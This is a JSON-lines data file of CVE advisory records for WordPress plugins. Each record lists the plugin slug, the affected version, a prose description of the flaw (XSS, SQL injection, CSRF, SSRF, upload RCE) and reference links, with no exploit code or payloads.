{"CVE_ID":"CVE-2023-2068","slug":"file-manager-advanced-shortcode ","versionImpact":"2.3.2","description":"The File Manager Advanced Shortcode WordPress plugin through 2.3.2 does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to RCE in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f72953-56d2-4d86-a49b-311b5fc58056\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58f72953-56d2-4d86-a49b-311b5fc58056\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4796","slug":"woocommerce-jetpack","versionImpact":"7.1.0","description":"The Booster for WooCommerce for WordPress is vulnerable to Information Disclosure via the 'wcj_wp_option' shortcode in versions up to, and including, 7.1.0 due to insufficient controls on the information retrievable via the shortcode. This makes it possible for authenticated attackers, with subscriber-level capabilities or above, to retrieve arbitrary sensitive site options.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L450\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L450\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4cd49b2-ff93-4582-906b-b690d8472c38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4cd49b2-ff93-4582-906b-b690d8472c38?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6326","slug":"master-slider","versionImpact":"3.9.3","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.9.3. This is due to missing or incorrect nonce validation on the 'process_bulk_action' function. This makes it possible for unauthenticated attackers to duplicate or delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0a7108-15ef-42d0-adce-fd5b0e6faf3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0a7108-15ef-42d0-adce-fd5b0e6faf3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/admin\\\/includes\\\/classes\\\/class-msp-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/admin\\\/includes\\\/classes\\\/class-msp-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2220","slug":"button-contact-vr","versionImpact":"4.7","description":"The Button contact VR WordPress plugin through 4.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe8c001e-8880-4570-b010-a41fc8ee0c58\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe8c001e-8880-4570-b010-a41fc8ee0c58\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37556","slug":"wordpress-notification-bar","versionImpact":"1.3.10","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SeedProd WordPress Notification Bar allows Stored XSS.This issue affects WordPress Notification Bar: from n\/a through 1.3.10.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-notification-bar\\\/wordpress-wordpress-notification-bar-plugin-1-3-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-notification-bar\\\/wordpress-wordpress-notification-bar-plugin-1-3-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8052","slug":"ratings-shorttags","versionImpact":"1.6","description":"The Review Ratings WordPress plugin through 1.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d821a6d0-d749-4e02-9b7c-3065e66e1c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d821a6d0-d749-4e02-9b7c-3065e66e1c97\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9884","slug":"t-countdown","versionImpact":"2.4.8","description":"The T(-) Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tminus' shortcode in all versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a0dcdf-e98f-4e24-9900-49ca522b8038?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a0dcdf-e98f-4e24-9900-49ca522b8038?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/t-countdown\\\/trunk\\\/t-countdown.php#L810\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/t-countdown\\\/trunk\\\/t-countdown.php#L810\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/t-countdown\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/t-countdown\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52431","slug":"wp-video-robot","versionImpact":"1.20.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pressaholic WordPress Video Robot - The Ultimate Video Importer allows SQL Injection.This issue affects WordPress Video Robot - The Ultimate Video Importer: from n\/a through 1.20.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-video-robot\\\/wordpress-wp-video-robot-plugin-1-20-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-video-robot\\\/wordpress-wp-video-robot-plugin-1-20-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13330","slug":"justrows-free","versionImpact":"0.2","description":"The JustRows free WordPress plugin through 0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0360650-8c7a-4e17-8618-b5ef1c71ccbf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13924","slug":"starter-templates","versionImpact":"2.0.0","description":"The Starter Templates by FancyWP plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.0.0 via the 'http_request_host_is_external' filter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starter-templates\\\/trunk\\\/classess\\\/class-export.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/starter-templates\\\/trunk\\\/classess\\\/class-export.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9355b100-08a9-4640-a91b-e56ba1ab9b07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9355b100-08a9-4640-a91b-e56ba1ab9b07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1398","slug":"ultimate-bootstrap-elements-for-elementor","versionImpact":"1.3.6","description":"The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018heading_title_tag\u2019 and \u2018heading_sub_title_tag\u2019 parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed191380-6037-4d59-8db7-cb33136a304e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed191380-6037-4d59-8db7-cb33136a304e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-bootstrap-elements-for-elementor\\\/tags\\\/1.3.6\\\/templates\\\/elements\\\/heading.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1450","slug":"shariff","versionImpact":"4.6.10","description":"The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'align'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a3d8e3-17b1-488b-9c42-2479932c9bf7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/tags\\\/4.6.10\\\/shariff.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shariff\\\/tags\\\/4.6.10\\\/shariff.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047668%40shariff&new=3047668%40shariff&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8051","slug":"special-feed-items","versionImpact":"1.0.1","description":"The Special Feed Items WordPress plugin through 1.0.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5edf7ed-207c-48bb-9226-8647ad4348e4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5edf7ed-207c-48bb-9226-8647ad4348e4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9846","slug":"enable-shortcodes-inside-widgetscomments-and-experts","versionImpact":"1.0.0","description":"The Enable Shortcodes inside Widgets,Comments and Experts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ac2544-f96b-4859-96de-795753a94264?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ac2544-f96b-4859-96de-795753a94264?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/trunk\\\/enable-shortcodes-inside-widgets-comments-experts.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/trunk\\\/enable-shortcodes-inside-widgets-comments-experts.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enable-shortcodes-inside-widgetscomments-and-experts\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23931","slug":"dh-local-seo","versionImpact":"2.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound WordPress Local SEO allows Blind SQL Injection. This issue affects WordPress Local SEO: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dh-local-seo\\\/vulnerability\\\/wordpress-wordpress-local-seo-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/dh-local-seo\\\/vulnerability\\\/wordpress-wordpress-local-seo-plugin-2-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13329","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres WordPress plugin through 0.9.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f923e557-dc3c-43b7-9545-9e92751c9783\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1328","slug":"mrlegend-typedjs","versionImpact":"1.2.0","description":"The Typed JS: A typewriter style animation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018typespeed\u2019 parameter in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrlegend-typedjs\\\/trunk\\\/public\\\/class-typed-js-public.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrlegend-typedjs\\\/trunk\\\/public\\\/class-typed-js-public.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mrlegend-typedjs\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mrlegend-typedjs\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdb15198-68dc-4612-abcc-6b02843f1629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdb15198-68dc-4612-abcc-6b02843f1629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3868","slug":"admin-bookmarks","versionImpact":"0.1","description":"The Custom Admin-Bar Favorites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'menuObject' parameter in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-bookmarks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-bookmarks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417fb507-a414-4bc2-ab01-d6f2fc554350?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417fb507-a414-4bc2-ab01-d6f2fc554350?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8690","slug":"addi-simple-slider","versionImpact":"2.0","description":"The Simple Responsive Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/addi-simple-slider\\\/tags\\\/2.0\\\/methods.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/addi-simple-slider\\\/tags\\\/2.0\\\/methods.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addi-simple-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addi-simple-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7888aedb-5421-4c3a-8459-d6177b398a06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7888aedb-5421-4c3a-8459-d6177b398a06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4319","slug":"advanced-cf7-db","versionImpact":"2.0.2","description":"The Advanced Contact form 7 DB plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'vsz_cf7_export_to_excel' function in versions up to, and including, 2.0.2. This makes it possible for unauthenticated attackers to download the entry data for submitted forms.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c66b185-fd4b-452d-890b-0f1850d8a7be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c66b185-fd4b-452d-890b-0f1850d8a7be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-cf7-db\\\/trunk\\\/admin\\\/class-advanced-cf7-db-admin.php#L1459\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-cf7-db\\\/trunk\\\/admin\\\/class-advanced-cf7-db-admin.php#L1459\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8047","slug":"visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams","versionImpact":"1.06","description":"The Visual Sound (old) WordPress plugin through 1.06 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ae1474c-9193-48ee-8cf6-d19900ad95f4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ae1474c-9193-48ee-8cf6-d19900ad95f4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23867","slug":"wpfilesearch","versionImpact":"1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound WordPress File Search allows Reflected XSS. This issue affects WordPress File Search: from n\/a through 1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpfilesearch\\\/vulnerability\\\/wordpress-wordpress-file-search-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpfilesearch\\\/vulnerability\\\/wordpress-wordpress-file-search-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13328","slug":"giga-messenger-bots","versionImpact":"2.3.1","description":"The Giga Messenger WordPress plugin through 2.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/543a209b-c43c-46fc-8369-edb3b7e0ca98\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/543a209b-c43c-46fc-8369-edb3b7e0ca98\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0866","slug":"legoeso-pdf-manager","versionImpact":"1.2.2","description":"The Legoeso PDF Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018checkedVals\u2019 parameter in all versions up to, and including, 1.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L543\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L543\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/legoeso-pdf-manager\\\/trunk\\\/inc\\\/admin\\\/class-pdf-doc-list-table.php#L567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/legoeso-pdf-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/legoeso-pdf-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e640767-7998-4404-a894-0b1794464c66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e640767-7998-4404-a894-0b1794464c66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3867","slug":"ajax-comment-form-cst","versionImpact":"1.2","description":"The Ajax Comment Form CST plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation via the 'acform_cst_settings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-comment-form-cst\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ajax-comment-form-cst\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a001b31-042d-451b-ad9e-df8d41d3c2b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a001b31-042d-451b-ad9e-df8d41d3c2b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13865","slug":"drm-protected-video-streaming","versionImpact":"4.2.1","description":"The S3Player WordPress plugin through 4.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cc7c5cb-983f-4593-abc5-7e224b275a23\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9cc7c5cb-983f-4593-abc5-7e224b275a23\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
